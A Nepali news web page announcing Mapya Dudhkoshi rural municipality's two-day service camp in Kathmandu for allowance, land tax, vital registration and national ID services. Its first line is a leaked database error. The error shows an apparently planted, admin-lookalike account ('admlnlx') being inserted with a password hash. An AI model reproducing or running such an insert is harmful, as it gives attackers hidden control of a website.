WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMC00zH4FyqDBP4Ug8s.ancSlo/sJ.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:19:45', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकाले काठमाडौंमा दुईदिने एकीकृत शिबिर सन्चान गर्ने भएको छ ।
माप्य दुधकोशी गाउँपालिकाबाट काठमाण्डौ आई बसोबास गर्ने आफ्नो नागरिकको लागि यहि श्रावन २६ र २७ गते काठमाण्डौ सुकेधारा स्थित नवदुर्ग पार्टी भेनुमा एकीकृत शिबिर सन्चालन गर्ने भएको हो ।
बर्खायाम भएका कारण आवागमनमा समस्या भएर गाउँपालिकासम्म पुग्न कठिनाई हुने भएका कारण काठमाडौंमा बसोबास गरिरहेका माप्यबासिलाई सहज रूपमा सेवा पुर्याउने उद्देश्यले शिबिर सन्चालन गरिने गाउँपालिका प्रबक्ता अमित राइले बताए ।
दुई दिन सम्म सन्चालन हुने शिबिरमा सामाजिक सुरक्षा भत्ता दर्ता तथा नविकरण, मालपोत तथा भुमि कर संकलन, जन्म मृत्यु दर्ता, बसाई सराई, राष्ट्रिय परिचय पत्र वितरण लगायतका सेवा दिइने गाउपालिकाले जनाएको छ ।